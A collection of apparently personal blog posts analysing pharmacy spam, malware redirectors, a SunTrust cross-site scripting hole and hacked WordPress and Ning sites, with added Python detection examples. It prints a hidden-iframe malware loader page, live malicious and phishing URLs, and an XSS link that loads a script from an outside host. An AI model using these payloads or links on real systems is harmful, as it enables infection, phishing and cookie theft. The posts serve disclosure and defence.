reCAPTCHA is Toast

Over the past six weeks or so, one of my email accounts has been flooded with spam advertising phony Internet “pharmacy” sites and penis pill sites.

It still blows my mind to this very day that people actually give money to these folks and actually believe they are getting real drugs, rather than corn starch and food coloring, in return, but that’s a whole separate issue.

The spam I have been getting differs from the ordinary, garden-variety junk “pharmacy” spam I get in that all of it advertises URLs belonging to social networking sites. Each URL is a phony profile of a bogus user, whose user information is nothing but a redirector to a spam site.

I’ve seen this happen before. Usually, it happens when some naive person decides to set up a niche social networking site of some sort, like a social networking site for professional engineers who work in Third World countries or a site for some obscure band or something, but doesn’t know anything about security.

The Russians love people like that. Nearly all Internet pharmacy sites, even (especially) the ones that claim to be Canadian, are run by Russian organized crime. The various crime gangs use bots–computer programs that automatically scan through hundreds of thousands of Web sites per day, searching for small social networking sites. When they find one, they attempt to create phony users. If they succeed, the bot software will start setting up thousands, or even tens of thousands, of bogus users, all automatically, and stuff those bogus user profiles full of ads for the phony pharmacy sites.

So you’ll end up with some Web site that’s dedicated to fans of some Brazilian soccer team or something, and it will have 27,498 users with names like “BuyCheapTramadolHere.” Whenever you visit the user profile page for the site, you get redirected to the fake pharmacy. The spammers then advertise the URL of the Brazilian soccer team site in their spam emails.

This is why it is absolutely essential that anyone who sets up a Web site that allows users to sign up and create profiles must, absolutely must, use some kind of system to prevent bot software from creating phony profiles.


Enter the CAPTCHA–those weird squiggly lines of text that you have to type in in order to fill out many Web forms. The idea behind a CAPTCHA is that a computer program can’t read the words, so computer programs can’t be used to fill out the form.

Organized crime has spent a huge amount of money and time in trying to figure out ways to break CAPTCHAs. Some of the most cutting-edge work in computer optical character recognition is coming from Eastern European organized crime. (Some Web services, such as Gmail, are worth so much to organized crime–mail sent from a Google mail server is almost never blocked by spam filtering software–that organized crime gangs have been known to pay unemployed Third Worlders a penny or so apiece to sit in front of a computer typing in CAPTCHA codes all day.) Another strategy that criminals have used to defeat high-value CAPTCHAs is to do things like set up phony Web sites offering free porn to people if they type in CAPTCHA codes first.

In the past, whenever I have received spam advertising a URL or a redirector hosted on a social networking site, the social networking site has turned out not to be using a CAPTCHA. That makes it trivial for the spammers to create phony accounts to act as redirectors to their spam sites.

CAPTCHAs are such a mandatory part of good Web practice that there are businesses whose sole business is providing CAPTCHA generation software or services to Web owners. One such business is a company called reCAPTCHA, which provides free CAPTCHAs for Web site owners. Hundreds of thousands of Web sites, including many high-profile sites like Craigslist, use CAPTCHAs generated by reCAPTCHA.

And that’s where things get interesting.


Back to my inbox.

Like I said, it’s been flooded lately. I’ve seen literally thousands of bits of spam all advertising bogus profiles on various social networking sites.

Unsurprisingly, many of them are hosted by Ning, the failed and woefully insecure social networking platform cofounded by ex-Netscape cofounder Marc Andreessen, and which today seems to serve primarily as a platform for spammers (as I’ve detailed here). The URLs in the spam look like this:

http://scaryguy.ning.com/profiles/blogs/detrol-detrol-la-homeopathic
http://myjumpspace.ning.com/forum/topics/zocor-zocor-similar-products
http://igotittoo.ning.com/profiles/blogs/cialis-professional-cheapest
http://morecoffee.ning.com/forum/topics/acai-fit-com-now-foods-acai
http://onelion.ning.com/forum/topics/desyrel-buy-cheap-desyrel
http://tvsbrasil.ning.com/profiles/blogs/namenda-tapering-namenda-buy
http://cincinnatiown.com/profiles/blogs/omeprazole-marijuana-and

So in other words, about par for the course for Ning; it’s a sewer of spam, and since it recently fired most of its staff, it’s unlikely ever to improve.

But a lot of the other URLs I’ve been seeing aren’t hosted on Ning:

http://celexa108s.mysoulspot.com/
http://www.design21sdn.com/people/52077
http://community.sgdotnet.org/forums/t/28066.aspx

Those three sites (mysoulspot.com, design21sdn.com, and sgdotnet.org) have been hit particularly hard, with each of them currently hosting literally thousands or even tens of thousands of spam profiles.

I visited these and other social networking sites that kept popping up in my spam, expecting to see that they were not using CAPTCHAs to protect themselves from bot software signups.

But that isn’t what I found at all. Instead, what I discovered is that every one of the sites I’m seeing that’s being attacked, including the Ning sites and the social networking sites not related to Ning, is using reCAPTCHA as its CAPTCHA provider.

All of them.

Which suggests very strongly to me that reCAPTCHA has been busted. Organized crime has written, I suspect, software that is effective enough at breaking reCAPTCHA protection that it is effectively useless.

Computer Malware in 4 seconds

One of my email inboxes lately has been flooded with spam for phony “Canadian pharmacy” sites (does anyone actually believe that scam? Seriously?) And when I say “flooded,” I mean “50-60 a day or so.”

These spam messages come in two varieties. One is standard straight-ahead spam: an image, sometimes embedded in the email and sometimes loaded remotely from the spam site, that advertises cheap prices on Viagra, and a Web link to the spam pharmacy site itself.

The other variety is different. It’s invariably a message claiming to be a bounced email notification, a greeting card notification, or something along those lines, with an attached HTML file. The HTML file, if it is opened, redirects to some poor schmuck’s hacked Web site, where it displays the message

“Please, waiting….. 4 seconds”

Then after 4 seconds, it redirects to the same spam pharmacy sites as the first variety.

“Well, hmm,” I thought to myself, “that’s odd. Why is the redirector waiting for four seconds?”

So I looked at some of the redirector pages, and the answer seems to be “Because the spammers are now shitting where they eat.”


Spammers have used computer viruses and malware for years. That’s nothing new. Most computer spam is sent through home Windows PCs that have been infected by viruses. The viruses install back-door remote control software and email server software on the infected PC; the spammers then take over the infected PC, without the owner knowing, and use it to send spam.

But generally speaking, in the past the spammers have not tried to use their fake pharmacy sites to spread malware. They have preferred to keep the malware and the phony medicine separate; they spread malware through one set of sites, and sell fake prescription meds through another.

Not any more.

The new system attempts to download computer malware onto the computers of people who respond to the spam. Here’s how it works:

Step 1: The spammers hack a poorly secured Web site. Often, these are Web sites run by very small companies, using outdated ecommerce software without security patches. I’ve also seen a whole bunch of these sites hosted on GoDaddy and The Planet; I don’t know if these ISPs are directly being attacked, but they seem to be hosting the bulk of the hacked sites.

Step 2: A file named “index3.html” is placed on the hacked Web site. This file looks like this:

PLEASE, WAITING…. 4 sec

<meta http-equiv="refresh" content="4;url=http://knewname.com" />

<iframe src='http://panlip.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br>

Step 3: A spam email is created. The spam email has an attached HTML file that looks like this:

<meta http-equiv="refresh" content="0;url=http://designcomforttx.com/index3.html" />

*** WARNING *** WARNING *** WARNING ***
The URLs above and elsewhere in this post are live as of the time of this writing. They WILL attempt to download malware in an iFrame before redirecting to a spam pharmacy site. DO NOT attempt to visit these URLs if you don’t know what you’re doing!

Anyone who opens the HTML file attached to the spam email visits the hacked site, in this case designcomforttx.com. They stay on that site for 4 seconds while a hidden iFrame attempts to download a file from another site, in this case the Russian site panlip.ru, hosted by Tata Communications in India. After 4 seconds, the mark is redirected to a run-of-the-mill Badcow fake “Canadian” pharmacy page, in this case knewname.com, hosted in China.


I have not been able to determine what the iFrame does. On my machine, it downloads blank content. I’ve Googled some of the domains being used in these iFrames (there are several different domains being used in the attacks); some people have claimed that the attack domains examine the user’s browser, then attempt to download a PDF exploit or some other browser exploit if they detect a vulnerable browser configuration.


I’m seeing LOTS of these hacked Web sites, always with a file named “index3.html” and always with a hidden iFrame. The index3.html file always redirects to knewname.com but may first load the iFrame from one of many different sites.
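As an added example (not code from the original post), here is a small Python checker for the two-stage pattern just described: it parses an HTML attachment or a fetched index3.html, pulls out the meta-refresh delay and target, and flags 1x1 or hidden iframes pointing at a different host. The sample pages are constructed and use .example placeholder hosts; only their structure mirrors the files in the post.

```python
"""Checker for the "please wait 4 seconds" redirector pages described above.
Added example, not code from the original post.  The sample HTML is constructed
and uses .example placeholder hosts; only its structure (timed meta refresh plus
a hidden 1x1 iframe to a different host) mirrors the index3.html files."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class RedirectorParser(HTMLParser):
    """Collects the meta-refresh directive and any iframe that is effectively invisible."""

    def __init__(self):
        super().__init__()
        self.refresh = None        # (delay_seconds, target_url)
        self.hidden_iframes = []   # src values of 0x0/1x1 or hidden iframes

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}   # names are already lowercased
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.refresh = (int(m.group(1)), m.group(2))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "") in ("0", "1") and a.get("height", "") in ("0", "1")
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                self.hidden_iframes.append(a.get("src", ""))


def analyze(markup):
    """Return the redirect facts plus a verdict string for one HTML document."""
    p = RedirectorParser()
    p.feed(markup)
    p.close()
    delay, target = p.refresh if p.refresh else (None, None)
    iframe_hosts = [urlparse(src).hostname for src in p.hidden_iframes]
    target_host = urlparse(target).hostname if target else None
    if p.hidden_iframes and delay:
        # The delay exists only to give the hidden frame time to load before
        # the visitor is bounced to the landing page: the index3.html pattern.
        verdict = "staged-redirector"
    elif p.hidden_iframes:
        verdict = "hidden-iframe"
    elif delay == 0 and target:
        # A document whose only job is an instant bounce elsewhere: the
        # attachment pattern (harmless on its own, suspicious in an email).
        verdict = "instant-redirect"
    else:
        verdict = "no-redirector-pattern"
    return {
        "verdict": verdict,
        "refresh_delay": delay,
        "refresh_target_host": target_host,
        "hidden_iframe_hosts": iframe_hosts,
        "iframe_offsite": any(h != target_host for h in iframe_hosts),
    }


# Constructed samples (placeholder hosts), shaped like the files in the post.
STAGE_PAGE = """PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=http://landing.example" />
<iframe src='http://loader.example:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br>"""

ATTACHMENT = """<meta http-equiv="refresh" content="0;url=http://hacked-site.example/index3.html" />"""

BENIGN = """<html><body><p>Video:</p>
<iframe src="http://video.example/embed/1" width="640" height="360"></iframe></body></html>"""

if __name__ == "__main__":
    for name, doc in (("stage", STAGE_PAGE), ("attachment", ATTACHMENT), ("benign", BENIGN)):
        print(name, analyze(doc))
```

Run over a mail gateway's quarantined HTML attachments, the "instant-redirect" verdict alone is a useful triage signal; "staged-redirector" with an off-site iframe host is the pattern worth blocking outright.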

A partial list of hacked sites, some of which are still active at the time of this writing and some of which are not, includes:

In each case, the “index3.html” file is virtually identical, with the only difference being the server it attempts to load the iFrame from. Attack domains I have seen used in the iFrames include:

http://panlip.ru:8080/index.php?pid=10
http://sheepbody.com:8080/index.php?pid=10
http://cafemack.com:8080/index.php?pid=10

The payload site, knewname.com, is pixel-for-pixel identical to the other, more traditional pharmacy spam sites I’m seeing, such as superviagraonline.com. These sites are themselves virtually identical to, and use the same graphics as, other spam sites that places like the Spamtrackers wiki have connected to other Canadian Pharmacy spam (known Canadian Pharmacy spam site on left, knewname.com on right, click either thumbnail for a larger screen shot):

[Screenshots: known Canadian Pharmacy spam site (left), knewname.com (right)]

Conclusion: The Canadian Pharmacy spammers are directly involved in the writing and/or distribution of malware themselves, and have now begun an experiment in which they attempt to infect their own customers with their malware.

Is this evil?

When you buy a phone, especially a smart phone, you don’t really have a lot of control over what software goes on your phone or how your phone is used.

That’s a fact. It’s always been that way, and it will likely continue to be that way for the foreseeable future.

Apple has taken a lot of (well-deserved, in my opinion, and I say this as an iPhone user) shit for their weird app control-freakery. No porn, no apps developed using tools other than Apple’s own Xcode, no apps they find “controversial” or “offensive”…and the whole app approval process is as opaque as Glenn Beck’s sense of ethics.

So a lot of folks are turning to Google’s Android phones, in the misguided and poorly-founded belief that the fact that part of the Android stack is open source somehow means Google doesn’t exercise just as much control over the platform. This despite the fact that they have on a few occasions now refused to host apps that various telcos have asked them not to.

I’m not in the market for a new smartphone, so I’ve been watching the whole thing from the sidelines. But something did catch my eye recently, and it’s got me thinking down a path that zaiah thinks is evil.

Last week, a security researcher released a Google app that claimed to be a preview of the new Twilight film–you know, the one about lame-ass sparkly vampires or something, written by a conservative Mormon woman who wanted a nice Christian alternative to the evil witchcraft that’s woven all through the Harry Potter saga like evil anchovies on the pure pizza of God, so she wrote about stalking and violence and rape instead. Because, of course, the main theological debate facing scholars in the dawn of the 21st century is “who would Jesus rape?” But I digress.

Anyway, the app secretly contacted his server in the background and downloaded (innocuous) code. He wanted to see how easy it would be to persuade people to download an Android app that could install a rootkit, and how easy it would be to get such an app onto the Google app marketplace.

The answers turned out to be “a whole lot” and “easier than opening a bag of Cap’n Crunch,” apparently.

When Google found out, they vaporized all the copies of his app from all the Android smartphones out there.


Now, Apple also has a remote-kill switch. This is part and parcel of the state of the smart phone biz. A smart phone carrier or software vendor can reach out remotely and vaporize apps or files from your phone, without you being able to do anything about it. That’s the way it is.

But when Google vaporized this research app, the researcher discovered something interesting–Google also has the ability to remotely ADD an app to a user’s phone without the user knowing it. Google can remotely install software on Android phones over the air.

And that opens an interesting can of worms, oh yes it does.

The courts have ruled on several occasions that a company that has the ability to do something may be compelled to do it by a court order, whereas it is far more difficult to compel a company that does not have the capability to do something to add that capability.

Take Amazon and the Kindle (please!). Amazon revealed that it can remotely nuke a book from Kindles all over the world when someone started selling bootleg copies of George Orwell’s 1984, and Amazon reached out and wiped them.

Amazon then tearfully confessed that doing so had been an error in judgment and swore it would never do it again, but at this point they no longer have that option. Since they have demonstrated the ability to do it, the next time someone’s intellectual property is stolen and distributed for Kindle, the rights holder may be able to get a court order to force Amazon to nuke the offending files whether Amazon wants to or not. Amazon made that bed and might not have a choice about sleeping in it.


So here’s the conundrum I’m pondering. Since Google has the ability to remote install apps, what would happen if Google were forced by court order to use it? What would that do to the cell phone industry? Would people start staying away from Android in favor of other platforms without that ability? More important, would it lead to social dialog over what kind of power we should be willing to cede to the phone operators?

I’m considering writing an Android app that runs in the background and sends the GPS coordinates of the phone to a server every few minutes. I am also thinking about approaching a bunch of police departments and saying “I’ve written this app. I will not distribute it to anyone except law enforcement. If you get a court order to put it on someone’s phone, I’ll give it to you and you can compel Google to install it remotely.”

Might not ever get used. But the first time it did get used, I have a feeling it’d generate quite a shitstorm. And open a conversation that I think probably needs to happen.

zaiah says that doing this would be evil. What say you, Oh Interwebs?

Email: The Next Brute-Force Attack Frontier

A few days ago, I got emails from a group of folks who said I’d sent them spam. This happens from time to time, as spammers tend to forge the “From” addresses in the spam emails they send.

A couple of those folks were kind enough to forward me samples of the spam emails with full headers, and as it turns out, they did in fact come from my email server, though with a Ukrainian IP address.

It would seem there’s a spam group in Eastern Europe that is doing brute-force attacks on large numbers of email addresses, attempting to find the passwords for IMAP and SMTP accounts. I have an AOL email address whose password, foolishly, was a dictionary word–an uncommon word, to be sure, but a dictionary word nonetheless. This is the password that was compromised.

Since then, I’ve heard of a couple other folks who’ve had the same thing happen to them. Legitimate email accounts without highly secure passwords were breached, apparently in brute-force attacks, and then used to send large volumes of spam.

So the lesson here: Choose secure email passwords! If your email account password is weak, it may end up being compromised.

OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I have shown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.
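To make the mechanism concrete, here is an added Python example (not SunTrust’s code) that contrasts an unescaped render of the TOPNAME parameter with an escaped one, then checks the output for script tags the way a browser would see them. The page template and all hostnames are assumptions, and the demo URL is constructed with the same payload shape as the link above.

```python
"""Reflected XSS of the kind described above: a URL parameter echoed into
HTML without escaping lets a crafted link close the <a> tag and open a
<script src=...> tag.  Added example, not SunTrust's code.  The template is an
assumption about what a help-centre page renders; all hosts are .example
placeholders; the demo URL is constructed with the payload shape of the post."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Assumed page fragment: the topic name lands in an attribute and in the link text.
TEMPLATE = '<a href="/doc/{sid}.xml" title="{topname}">{topname}</a>'


def render_vulnerable(sid, topname):
    """Straight interpolation: whatever the URL carried becomes markup."""
    return TEMPLATE.format(sid=sid, topname=topname)


def render_hardened(sid, topname):
    """Escape for the HTML context; quote=True also neutralises the closing quote
    the payload relies on, so the value can neither end the attribute nor open a tag."""
    return TEMPLATE.format(sid=html.escape(sid, quote=True),
                           topname=html.escape(topname, quote=True))


def handle_request(url, renderer):
    """Minimal stand-in for the server: read SID/TOPNAME from the query string."""
    q = parse_qs(urlparse(url).query)
    return renderer(q.get("SID", [""])[0], q.get("TOPNAME", [""])[0])


class ScriptFinder(HTMLParser):
    """Records every <script src> the browser would actually execute."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def injected_scripts(markup):
    """Return the src of each script tag present in the rendered output."""
    f = ScriptFinder()
    f.feed(markup)
    f.close()
    return f.script_srcs


# Constructed link: same "%22%3E%3C/a%3E%3Cscript%20src=%22..." shape as the demo above.
DEMO_URL = ("http://helpcenter.example/doc/sn6400.xml?SID=586"
            "&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://attacker.example/xssdemo.js")
NORMAL_URL = "http://helpcenter.example/doc/sn6400.xml?SID=586&TOPNAME=Online%20Banking"

if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = handle_request(DEMO_URL, renderer)
        print(label, "->", injected_scripts(out) or "no injected script")
```

The same check is a cheap regression test for any page that echoes query parameters: render with the payload-shaped URL and assert that no script tag appears.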

Technical details under the cut

ecommerce.com: hacked by GHoST61

Last week, I was on a Web forum where someone talked about his Web site being defaced. He’d been running an insecure install of phpNUKE without keeping on top of security patches, and his site was taken down and replaced with a page reading “Hacked by GHoST61” and a picture of the first president of Turkey.

I did some investigating, and discovered that GHoST61 is a prolific Turkish hacker who defaces Web pages in a very characteristic way; he or she replaces the home page with the message “Hacked by GHoST61” and sometimes a picture of the Turkish president, sometimes a missive against the Iraq war, and sometimes a combination of both.

GHoST61 generally strikes me as being more of a script kiddie than a serious, knowledgeable hacker. A Google search for the phrase “Hacked by GHoST61” currently turns up about 30,000 results, the majority of which look like sites running old, outdated, insecure installs of phpNUKE, Drupal, ZenCart, osCommerce, or other server apps with known security holes. The attacks are probably automated, with point-n-drool tools that search for known vulnerabilities in popular Web application and content management packages.

In other words, GHoST61, whoever he or she is, mostly goes after low-hanging fruit.

Mostly.

Just because it’s what I do, I started wading through the Google results and checking to see where the hacked sites were hosted. And I found something of a surprise.

I checked several results, and found the majority of them were living on a single ISP, ecommerce.com (which does Web hosting under the names iX Web Hosting and WebHost.biz).

Curious, I kept digging, choosing random Google results to examine (in case the order of the Google results was determined by time, and the hacker just happened to be searching in IP space belonging to ecommerce.com recently). What I discovered was that the majority of hacked sites all across Google’s results, by a large margin, were hosted in the same place.

The next thing I thought was that it could be simply a question of the ISP’s size. After all, if the Web sites that had been defaced were spread out evenly across many ISPs, and one ISP hosted a million sites whereas another ISP hosted only ten thousand sites, I’d expect to see more hacked sites hosted on the larger ISP, right?

But this didn’t hold water, either. The ISP ecommerce.com advertises that it hosts about 500,000 sites. Much larger Web hosting companies such as Peer 1 hosted a far smaller number of hacked sites.

So I started counting. I grabbed a bunch of Google results at random, looked to see who was hosting them, and recorded the results. Here’s what I found (number of hacked sites on the vertical axis, Web hosting company on the horizontal axis):

It seems to me that ecommerce.com has a problem here. While GHoST61 will hack vulnerable Web sites with security holes no matter where they’re hosted, there is a very, very large cluster of hacked sites living on ecommerce.com servers.

This may indicate that ecommerce.com doesn’t enforce good security practices, or that ecommerce.com is slow to respond to hack attacks. Or it may indicate a more systemic problem at ecommerce.com, such as some sort of server-level vulnerability that allows easy penetration of many of their Web sites.

Whatever the problem, it definitely appears that ecommerce.com has some sort of issue here.

Ning: Where security is something we consider.

A few days ago, I wrote about what appears to be a massive breach at Ning, a social networking platform that allows people to create their own niche social networking sites. The Ning security appears to be compromised, and the social networking sites they host are overrun with automated spam advertising links and redirectors to computer viruses–over a million of them, in fact.

As a good Internet citizen, I dropped an email to Ning alerting them to the problem. I’ve since received back what appears to be a stock form email in response:

Hi there,

Thanks for bringing this to our attention. As you may already know, Ning is a platform that enables individuals to build their own social networks. We aren’t involved in the decisions relating to content uploaded or published by Network Creators or members. In addition, we aren’t involved in the management of the social networks on our platform, or in any of the decisions relating to the focus of social networks created on our platform. That said, we’ll look into this and take action if we determine that our Terms of Service have been violated.

Thanks again!
The Ning Team

ref:00D8cCLt.5004AJJb9:ref

I’ve checked, and the problem still exists. Google is delisting the virus redirectors pretty quickly, but they’re being added even more quickly. Right now, Google shows about 600,000 virus redirectors on various Ning-hosted sites, with many more existing but not listed in Google.

It seems that Ning either does not understand or does not care about the scope of the problem they face.

In a way, I’m not surprised. iPower Web took over a year to fix their security when they were hit with a massive, ongoing server security breach, for example.

But it is disappointing. An executive at Verizon recently wrote an essay deriding security researchers who talk about security issues publicly as “narcissistic vulnerability pimps” who “solely for the purpose of self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”

But considering how poorly ISPs and software vendors tend to respond to security problems, and how cavalier they seem to be with the safeguarding of their users’ data, it’s hard to see this essay as anything more than the whining of crybaby managers who would rather play Quake III Arena than take care of fixing gaping security holes in their systems.

Meantime, I still suggest that anyone hosted on Ning seek hosting elsewhere.

Another day, another massive computer hack attack

Note: followup to this post at http://tacit.livejournal.com/325770.html

I run quite a number of WordPress blogs: weeklysextips.com, the Whispers blog at symtoys.com, the Skeptical Pervert blog (which I haven’t actually done anything with yet, as I haven’t started my podcast yet), and so on.

These blogs all run comment spam filtering software, because automated WordPress comment spam is a big problem with any WordPress blog. A lot of the automated comment spam contains, of course, redirectors to malware, mostly disguised as porn links.

I occasionally trawl through the spam comments on my blogs; it’s an amazing early warning system to see what the malware writers are up to these days. Recently, I found a spate of malware spam advertising URLs hosted on a Web site called nashville.net; the spam promised all sorts of free sexual delights if I would but go to such Web addresses as

http://www.nashville.net/profile/3nz5lxzvocvcd
and
http://www.nashville.net/profile/jetttoland59

and so on.

I did some poking around on Nashville.net and discovered that it has been compromised like a Senator with a gambling addiction; at the moment, it’s hosting somewhere around 4,200 phony profiles, all of which are redirectors to sites that try to download malware. Each phony profile leads to the same place: a URL at

http://sexsuite.ru/stds/go.php?sid=14

which is a traffic handling Web site that works the same way that the traffic redirector sites used by malware networks I’ve talked about before do.

So I decided to be a good citizen and drop a line to the owner of nashville.net, and his Web host, letting him know he’d been massively breached.

That’s when things got interesting.


The Web site nashville.net is a “community site,” a small niche social networking site hosted by an outfit called Ning.

Parsing input: nashville.net
Routing details for 8.6.19.68
"whois NET-8-6-19-0-1@whois.arin.net" (Getting contact from whois.arin.net)
Found AbuseEmail in whois abuse@ning.com
8.6.19.0 – 8.6.19.255:abuse@ning.com
Using abuse net on abuse@ning.com
abuse net ning.com = postmaster@ning.com, abuse@ning.com, abuse@level3.com

Ning is a personal social networking site founded by the guy who started Netscape, Marc Andreessen. It basically lets you create your own mini MySpace or LiveJournal or whatever you like–a small social networking platform aimed at whatever niche you want. It’s had a checkered past, and has struggled to make money; three days ago, Ning announced that it would become pay only and would cancel its free services. It also fired 40% of its staff.

But that’s not the really interesting part.

The really interesting part is that it looks like all of Ning, with all the social networks and online forums it hosts, has been pwn3d from balls to bones.

A search for some of the exact words and phrases used by the virus redirectors on nashville.net, one of Ning’s social networking sites, produces 1,060,000 results…and as near as I can tell, they are all on Ning.

Now, a conspiracy theorist might come up with all kinds of conspiracies to explain this–disgruntled employees, knowing what was coming, leaving the back door open; executives of a foundering company, desperate for cash, turning a blind eye to Russian malware writers; whatever. I suspect that the reality is what it always is–incompetence, someone asleep at the switch, management that doesn’t appreciate security and doesn’t want to pay for it…the same sorts of things that seem to be behind this sort of thing almost every time.

But if you use Ning, or you know someone who does, my advice is to leave.

Profiteering from affiliate programs, the Russian organized crime way

I have a Formspring.me account. If you’re not familiar with it, Formspring is a Web site that you can use to receive anonymous questions from people, which you can then answer in a way that lets everyone read your answers.

It’s actually pretty cool. My Formspring account is here, and I kind of enjoy answering random questions from folks. If, y’know, there’s something you want to ask.

Anyway, a few days ago I got this message posted anonymously to my Formspring:

Hey, I am posting anonymous because I don’t want you to know who I am but I found a nude image of you online. You may have to login to see it, but here’s the link: nudeimagedatabase(DOT)t35(DOT)(DOT)com/nude_image_549(DOT)html replace all the (DOT) with .

Now, first thing I thought was Russian mob spreading computer malware–Zlob or Asprox or something, right? I mean, seriously, it’s got their thumbprint all over it.

Turns out that’s not what it was, though. What it was is something a little more convoluted, and it exposes a weakness in Web sites that have a pay-for-signups affiliate program business model.

We're about to get technical here…

Pwning WordPress for fun and profit

I have a love/hate relationship with WordPress.

Actually, that’s not true. I like WordPress rather a lot, and I wish that more open-source projects had the finish, polish, and sophistication of WordPress. I own about a half-dozen Web sites that run it, and I’m overall very fond of it.

What I don’t like is the number of people who set up a WordPress install, then walk away from it and never install any updates or security patches. WordPress is a popular target for hackers, because it’s widely deployed and easy to find, and because so, so many people don’t keep on top of updates.

Which, frankly, baffles me. It’s incredibly easy to update–easier, in fact, than any open-source server software I’ve ever used. You log in to the admin area. It tells you “There is an update. Click here to install the update.” You click one button. Bang, that’s it! There literally is nothing else you have to do.

So, anyway, today I found yet another phony bank phish in my email. The phish pretends to be an HSBC Bank page, and it attempts to trick the gullible into handing out their bank account number and password. So far, so bog-standard.

*** WARNING *** WARNING *** WARNING ***
The URLs in this post are live at the time of this writing. They do not lead to malware sites, but they DO lead to phony bank phish sites.

The phish page in my email lives at

http://internalcommunications.co.uk/img/1/IBlogin.html

It’s a pretty bog-standard phish, a page living on a hacked server that collects personal financial information and then sends it off to the phishers via a php-to-email script.

The server that it lives on, internalcommunications.co.uk, is hosted by heartinternet.co.uk and belongs to a guy named Simon Wright; his Whois details, including his email address, are protected by a privacy service.

The site itself is completely defaced. The defacement left a hole big enough to drive a truck through, and the phishers put the phony bank page on the site after the person or group who defaced it hacked it and left it wide open. EDIT: The site defacer, who goes by the name “NONE-STOP,” is also a phisher who sells stolen credit card numbers, stolen bank account login information, and other stolen identity information. More at the end of this post.

The front page of the hacked site, as of the time of this writing, looks like this (click for larger):

I haven’t heard of NONE.STOP, whoever he/she/they are; as near as I can tell, there’s only one other site defacement (www.cegm.ca) he/she/they have claimed responsibility for.

Now is where it gets interesting, and where WordPress comes in.

Normally, when a site is defaced, the images that are used in the defacement are uploaded to the hacked server. Not in this case. In this case, the images used in the defacement are being remote loaded from another server.

That other server is a hacked WordPress install that was set up a while ago, had a single test post added to it, and was then abandoned.

Specifically, the images used in the defacement are being loaded from

http://devriestree.com/components/com_content/views/.index/aa__blut.gif
http://devriestree.com/components/com_content/views/.index/4scpcn.jpg

and so on. The Web site devriestree.com is the one running the pwn3d WordPress, and it has been left alone; no defacement, no phishes, nothing. The person or group called NONE.STOP has simply created a hidden .index directory which is being used to store the pictures that he/she/they use when he/she/they deface other sites.
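A defender-side check for exactly this pattern, added here as an example and not code from the original post: it scans web-server access logs (Apache/nginx combined format) for image files served out of a dot-directory to pages on other sites, which is what a compromised host quietly acting as image storage for someone else's defacements looks like from the victim's side. The log lines are constructed; the host names and paths are the ones mentioned above.

```python
import re
from urllib.parse import urlsplit

# Combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")


def is_hidden_path(path):
    """True if any *directory* component of the URL path starts with a dot,
    e.g. /components/com_content/views/.index/aa__blut.gif (not a hidden file)."""
    return any(part.startswith(".") for part in path.split("/")[:-1] if part)


def find_hotlinked_hidden_images(log_lines, our_host):
    """Return (path, referer_host) for successful image requests served from a
    dot-directory where the Referer is a different site than our own."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "200":
            continue
        path = m.group("path").split("?")[0]          # drop any query string
        if not path.lower().endswith(IMAGE_EXT) or not is_hidden_path(path):
            continue
        ref_host = urlsplit(m.group("referer")).hostname or ""   # "-" -> no host
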